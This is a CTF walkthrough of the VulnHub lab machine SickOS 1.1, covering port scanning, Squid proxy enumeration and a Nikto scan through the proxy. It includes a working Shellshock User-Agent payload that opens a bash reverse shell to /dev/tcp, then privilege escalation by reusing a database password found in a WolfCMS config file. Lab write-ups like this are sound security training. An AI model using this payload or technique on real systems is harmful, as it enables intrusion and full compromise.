- Author Description
- Host Enumeration
- Squid Enumeration
- Nikto scan via Proxy
- Shellshock Bash Reverse Shell
- Local Enumeration
- Local Privilege Escalation
Author Description
This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them.
Author: @D4rk36
Download: VulnHub
Host Enumeration
Port Scanning
nmap -v -p 1-65535 -sV -O -sT 192.168.30.138
Service Enumeration
Port | Service | Version Detection |
---|---|---|
|
SSH |
OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) |
|
HTTP-Proxy |
Squid http proxy 3.1.19 |
Squid Enumeration
Inspection of Squid using the metasploit module auxiliary/scanner/http/squid_pivot_scanning
discovered port 80 was exposed via the proxy.
Nikto scan via Proxy
Nikto was configured to use the discovered Squid proxy:
[root:~]# nikto -h 192.168.221.138 -useproxy http://192.168.221.138:3128
Nikto disclosed the location /cgi-bin/status
, indicating the target could be vulnerable to shellshock.
Shellshock Bash Reverse Shell
Burp Suite was used to manipulate User-Agent:
to include the bash reverse shell.
() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1
A reverse shell was established:
[root:~]# nc.traditional -lp 443 -vvv
listening on [any] 443 ...
192.168.221.138: inverse host lookup failed: Unknown host
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.138] 59815
bash: no job control in this shell
www-data@SickOs:/usr/lib/cgi-bin$
Local Enumeration
Local enumeration of the system disclosed the file /var/www/wolfcms/config.php
containing:
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
Local Privilege Escalation
The previously discovered credentials worked for MySQL root, and were reused for the user sickos
and again for sudo
as the user sickos
.
Local Privilege Escalation:
www-data@SickOs:/$ su - sickos
su - sickos
Password: john@123
sickos@SickOs:~$ ls
ls
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit
sickos@SickOs:~$ sudo -s
sudo -s
[sudo] password for sickos: john@123
root@SickOs:~# cd /root
cd /root
root@SickOs:/root# ls
ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
root@SickOs:/root#
Root Flag
Thanks for the VM :)